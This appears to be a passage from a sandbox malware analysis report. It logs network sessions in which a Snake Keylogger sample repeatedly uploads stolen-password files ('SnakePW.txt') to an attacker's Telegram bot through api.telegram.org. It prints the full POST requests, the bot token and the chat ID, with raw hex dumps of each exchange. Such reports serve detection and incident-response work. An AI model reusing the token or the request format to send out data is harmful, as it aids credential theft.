                            Data Ascii: {"ok":true,"result":{"message_id":67037,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228868,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            255192.168.2.550167149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:28 UTC430OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575715e1f502
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:28 UTC430OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 35 65 31 66 35 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575715e1f502Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:28 UTC431INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:28 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:28 UTC431INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67038,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228868,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            256192.168.2.550168149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:28 UTC432OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757161ff376
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:28 UTC432OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 36 31 66 66 33 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757161ff376Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:29 UTC433INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:29 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:29 UTC433INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67039,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228869,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            257192.168.2.550169149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:29 UTC434OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757166515a2
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:29 UTC434OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 36 36 35 31 35 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757166515a2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:29 UTC434INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:29 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:29 UTC435INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67041,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228869,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            258192.168.2.550170149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:29 UTC435OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575716bfaf36
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:29 UTC436OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 36 62 66 61 66 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575716bfaf36Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:30 UTC436INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:30 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:30 UTC436INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67042,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228870,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            259192.168.2.550171149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:30 UTC437OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575716f42491
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:30 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 36 66 34 32 34 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575716f42491Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:30 UTC438INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:30 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:30 UTC438INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67043,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228870,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            26192.168.2.549794149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:49 UTC43OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756daa3ba90
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:49 UTC44OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 61 61 33 62 61 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756daa3ba90Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:49 UTC44INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:49 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:49 UTC45INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66773,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228769,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            260192.168.2.550174149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:30 UTC439OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575717322199
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:30 UTC439OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 37 33 32 32 31 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575717322199Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:31 UTC439INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:31 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:31 UTC440INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67044,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228871,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            261192.168.2.550177149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:31 UTC440OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575717964394
                            Host: api.telegram.org
                            Content-Length: 504
